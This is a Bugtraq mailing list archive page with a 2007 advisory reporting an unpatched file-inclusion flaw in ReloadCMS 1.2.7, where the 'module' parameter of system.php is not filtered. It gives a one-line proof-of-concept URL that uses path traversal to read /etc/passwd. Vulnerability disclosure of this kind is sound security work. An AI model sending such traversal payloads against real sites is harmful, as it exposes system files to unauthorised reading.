Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

ReloadCMS Vulnerable

From: sekuru () email ua
Date: 20 Oct 2007 14:27:20 -0000
    New Advisory:
    ReloadCMS
    http://reloadcms.com

    ——————–Summary—————-
    Software: ReloadCMS
    Sowtware’s Web Site: http://reloadcms.com/main/
    Versions: 1.2.7
    Critical Level: Moderate
    Type: Multiple Vulnerabilities
    Class: Remote
    Status: Unpatched
    PoC/Exploit: Available
    Solution: Not Available
    Discovered by: http://reloadcms.com

    Php include bug

    —————–Description—————
    vulnerable mosule system.php, parameter GET['module'] is not properly filtered

    ————–PoC/Exploit———————-
    http://site.url/index.php?module=../../../../etc/passwd

    ————–Solution———————
    No Patch available.

    ————–Credit———————–
    Discovered by: http://reloadcms.com
Previous By Date Next
Previous By Thread Next

Current thread: